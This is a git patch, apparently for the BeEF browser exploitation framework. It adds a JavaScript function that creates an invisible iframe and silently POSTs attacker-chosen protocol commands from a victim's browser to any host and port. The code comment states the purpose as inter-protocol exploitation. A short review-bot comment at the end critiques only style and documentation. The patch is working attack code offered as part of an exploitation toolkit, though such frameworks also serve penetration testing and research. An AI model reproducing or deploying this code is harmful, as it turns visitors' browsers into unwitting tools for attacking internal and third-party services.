From 72ac600f9f3cb02f4441090c0b1054b86351bb47 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Sat, 27 Oct 2012 18:53:29 +1030
Subject: [PATCH] Add `createIframeIpecForm` function to client dom library
---
 core/main/client/dom.js | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 4cb0c2cba..70e6bad85 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -340,6 +340,30 @@ beef.dom = {
 formXsrf.submit();
 return iframeXsrf;
+ },
+
+ /**
+ * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
+ * @params: {String} rhost: remote host ip/domain
+ * @params: {String} rport: remote port
+ * @params: {String} commands: protocol commands to be executed by the remote host:port service
+ */
+ createIframeIpecForm: function(rhost, rport, commands){
+ var iframeIpec = beef.dom.createInvisibleIframe();
+
+ var formIpec = document.createElement('form');
+ formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html');
+ formIpec.setAttribute('method', 'POST');
+ formIpec.setAttribute('enctype', 'multipart/form-data');
+
+ input = document.createElement('textarea');
+ input.setAttribute('name', Math.random().toString(36).substring(5));
+ input.value = commands;
+ formIpec.appendChild(input);
+ iframeIpec.contentWindow.document.body.appendChild(formIpec);
+ formIpec.submit();
+
+ return iframeIpec;
 }
 };
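Review bot: `input` in `createIframeIpecForm` is assigned without `var`, so it becomes an implicit global on the page's `window` and would throw under strict mode; declare it as `var input = document.createElement('textarea');`, matching `iframeIpec` and `formIpec` above it. The doc block uses `@params:`, which is not a JSDoc tag, so `@param {String} rhost` and its siblings would be what tooling picks up, and a `@return` line for the returned iframe is missing. The function leaves the iframe attached to the document and hands it back, so the comment should also say that removing it is the caller's responsibility. The enclosing `beef.dom` object starts outside this hunk.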